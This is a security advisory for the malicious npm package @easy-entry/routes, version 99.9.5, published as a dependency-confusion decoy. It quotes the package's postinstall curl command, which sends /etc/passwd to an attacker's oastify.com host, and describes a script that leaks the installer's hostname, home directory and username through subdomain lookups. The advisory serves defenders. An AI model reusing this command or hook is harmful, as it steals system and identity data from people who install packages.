npm · Malicious package advisory
Malware@easy-entry/routes
MAL-2026-5410
Malicious code in @easy-entry/routes (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (29029f04aa1f06f388096de7cfdda12b92ce4c8dc68c2fe3e6091b318a521516) On `npm install`, the package's postinstall hook in package.json runs `curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, POSTing the contents of /etc/passwd to an attacker-controlled Burp Collaborator subdomain prefixed with the installer's hostname. The same hook executes scripts/scream3gg.js, which hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues an HTTP fetch to `http://<hex>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`, tunneling installer identity out via subdomain. The package has no legitimate functionality — it ships only the exfil payload. The scoped name `@easy-entry/routes` combined with an absurd `99.9.5` version is a textbook dependency-confusion shape designed to win resolution against an internal-only package of the same name.
Compromised versions (1)
- 99.9.5
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.